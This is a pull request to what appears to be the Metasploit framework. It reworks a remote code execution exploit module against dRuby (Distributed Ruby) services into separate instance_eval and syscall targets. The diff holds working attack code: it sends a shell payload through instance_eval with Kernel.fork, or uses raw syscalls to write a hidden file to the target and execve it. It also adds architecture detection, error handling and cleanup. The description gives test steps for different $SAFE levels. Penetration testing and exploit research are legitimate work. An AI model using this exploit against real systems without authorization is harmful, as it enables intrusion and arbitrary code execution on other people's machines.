### PR TITLE
Fix drb_remote_codeexec and create targets

### DIFF
--- a/modules/exploits/linux/misc/drb_remote_codeexec.rb
+++ b/modules/exploits/linux/misc/drb_remote_codeexec.rb
@@ -13,7 +13,10 @@ class MetasploitModule < Msf::Exploit::Remote
     super(update_info(info,
       'Name'           => 'Distributed Ruby Send instance_eval/syscall Code Execution',
       'Description'    => %q{
-        This module exploits remote code execution vulnerabilities in dRuby
+        This module exploits remote code execution vulnerabilities in dRuby.
+
+        If the dRuby application sets $SAFE = 1, the instance_eval target will fail.
+        In this event, the syscall target is preferred. This can be set with target 1.
       },
       'Author'         => [ 'joernchen <joernchen[at]phenoelit.de>' ], #(Phenoelit)
       'License'        => MSF_LICENSE,

--- a/modules/exploits/linux/misc/drb_remote_codeexec.rb
+++ b/modules/exploits/linux/misc/drb_remote_codeexec.rb
@@ -33,7 +33,10 @@ class MetasploitModule < Msf::Exploit::Remote
         },
       'Platform'       => 'unix',
       'Arch'           => ARCH_CMD,
-      'Targets'        => [[ 'Automatic', { }]],
+      'Targets'        => [
+        ['instance_eval', {}],
+        ['syscall', {}]
+      ],
       'DisclosureDate' => 'Mar 23 2011',
       'DefaultTarget' => 0))
 

--- a/modules/exploits/linux/misc/drb_remote_codeexec.rb
+++ b/modules/exploits/linux/misc/drb_remote_codeexec.rb
@@ -32,10 +32,6 @@ class MetasploitModule < Msf::Exploit::Remote
       'Payload'        =>
         {
           'DisableNops' => true,
-          'Compat'      =>
-            {
-              'PayloadType' => 'cmd',
-            },
           'Space'       => 32768,
         },
       'Platform'       => 'unix',

--- a/modules/exploits/linux/misc/drb_remote_codeexec.rb
+++ b/modules/exploits/linux/misc/drb_remote_codeexec.rb
@@ -7,7 +7,10 @@ require 'msf/core'
 require 'drb/drb'
 
 class MetasploitModule < Msf::Exploit::Remote
+
   Rank = ExcellentRanking
+
+  include Msf::Exploit::FileDropper
 
   def initialize(info = {})
     super(update_info(info,
@@ -58,19 +61,37 @@ class MetasploitModule < Msf::Exploit::Remote
     class << p
       undef :send
     end
+
+    case target.name
+    when 'instance_eval'
+      print_status('Trying to exploit instance_eval')
+      exploit_instance_eval(p)
+    when 'syscall'
+      print_status('Trying to exploit syscall')
+      exploit_syscall(p)
+    end
+  end
+
+  def exploit_instance_eval(p)
     begin
-      print_status('trying to exploit instance_eval')
       p.send(:instance_eval,"Kernel.fork { `#{payload.encoded}` }")
+    rescue SecurityError
+      print_error('instance_eval failed due to security error')
+    rescue DRb::DRbConnError
+      print_error('instance_eval failed due to connection error')
+    end
+  end
 
-    rescue SecurityError => e
-      print_status('instance eval failed, trying to exploit syscall')
-      filename = "." + Rex::Text.rand_text_alphanumeric(16)
+  def exploit_syscall(p)
+    filename = "." + Rex::Text.rand_text_alphanumeric(16)
+
+    begin
       begin
-
+        print_status('Attempting 32-bit exploitation')
         # syscall to decide wether it's 64 or 32 bit:
         # it's getpid on 32bit which will succeed, and writev on 64bit
         # which will fail due to missing args
-        j = p.send(:syscall,20)
+        p.send(:syscall,20)
         # syscall open
         i =  p.send(:syscall,8,filename,0700)
         # syscall write
@@ -82,13 +103,9 @@ class MetasploitModule < Msf::Exploit::Remote
         # syscall execve
         p.send(:syscall,11,filename,0,0)
 
-      # not vulnerable
-      rescue SecurityError => e
-
-        print_status('target is not vulnerable')
-
       # likely 64bit system
-      rescue => e
+      rescue Errno::EBADF
+        print_status('Target is a 64-bit system')
         # syscall creat
         i = p.send(:syscall,85,filename,0700)
         # syscall write
@@ -100,9 +117,17 @@ class MetasploitModule < Msf::Exploit::Remote
         # syscall execve
         p.send(:syscall,59,filename,0,0)
       end
+
+    # not vulnerable
+    rescue SecurityError
+      print_error('syscall failed due to security error')
+      return
+    rescue DRb::DRbConnError
+      print_error('syscall failed due to connection error')
+      return
     end
-    print_status("payload executed from file #{filename}") unless filename.nil?
-    print_status("make sure to remove that file") unless filename.nil?
-    handler(nil)
+
+    register_files_for_cleanup(filename)
   end
+
 end

--- a/modules/exploits/linux/misc/drb_remote_codeexec.rb
+++ b/modules/exploits/linux/misc/drb_remote_codeexec.rb
@@ -23,6 +23,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'References'     =>
         [
           [ 'URL', 'http://www.ruby-doc.org/stdlib-1.9.3/libdoc/drb/rdoc/DRb.html' ],
+          [ 'URL', 'http://blog.recurity-labs.com/archives/2011/05/12/druby_for_penetration_testers/' ]
         ],
       'Privileged'     => false,
       'Payload'        =>


### PR DESCRIPTION
Please read http://blog.recurity-labs.com/archives/2011/05/12/druby_for_penetration_testers/.

Then run through the following **verification steps**:

- [x] Test the ```instance_eval``` target with ```$SAFE = 0```
- [x] Test the ```instance_eval``` target with ```$SAFE = 1```
- [x] Test the ```syscall``` target with ```$SAFE = 0```
- [x] Test the ```syscall``` target with ```$SAFE = 1```

FYI, I was unable to get a shell with either target whenever ```$SAFE``` was set. YMMV.

Resolves #7514. You can find background info there.